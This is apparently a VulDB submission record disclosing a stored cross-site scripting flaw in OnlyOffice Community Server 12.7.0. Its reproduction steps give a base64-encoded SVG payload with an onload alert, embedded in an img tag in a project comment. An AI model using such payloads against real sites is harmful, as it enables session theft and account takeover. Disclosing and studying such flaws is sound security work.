| 标题 | Ascensio System SIA OnlyOffice Community Server 12.7.0 Cross Site Scripting |
|---|
| 描述 | Description
In OnlyOffice, users can create projects and add comments. While HTML input is permitted, it also allows embedding SVG images that can contain JavaScript, leading to an XSS vulnerability.
Credits: 0xHamy & Luke Smith
Reproduce
Adding comments to a project:
http://127.0.0.1:8088/Products/Projects/Messages.aspx?prjID=1&id=1#comments
From the comment section, enter raw HTML. The vulnerability can be exploited by abusing the <img> tag to load a base64 encoded SVG image.
Convert the following SVG payload into base64:
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" onload="alert('xss')"><rect width="200" height="200" fill="lightblue" /></svg>
Create the payload using the base64 encoded value:
<img src="data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyMDAiIGhlaWdodD0iMjAwIiBvbmxvYWQ9ImFsZXJ0KCd4c3MnKSI+PHJlY3Qgd2lkdGg9IjIwMCIgaGVpZ2h0PSIyMDAiIGZpbGw9ImxpZ2h0Ymx1ZSIgLz48L3N2Zz4=" alt="XSS">
The alert will be executed whenever the SVG image loads. |
|---|
| 来源 | ⚠️ https://hkohi.ca/vulnerability/20 |
|---|
| 用户 | 0xHamy (UID 88518) |
|---|
| 提交 | 2025-08-16 05時22分 (8 月前) |
|---|
| 管理 | 2025-09-11 07時42分 (26 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 323614 [Ascensio System SIA OnlyOffice 直到 12.7.0 SVG Image Messages.aspx 跨网站脚本] |
|---|
| 积分 | 20 |
|---|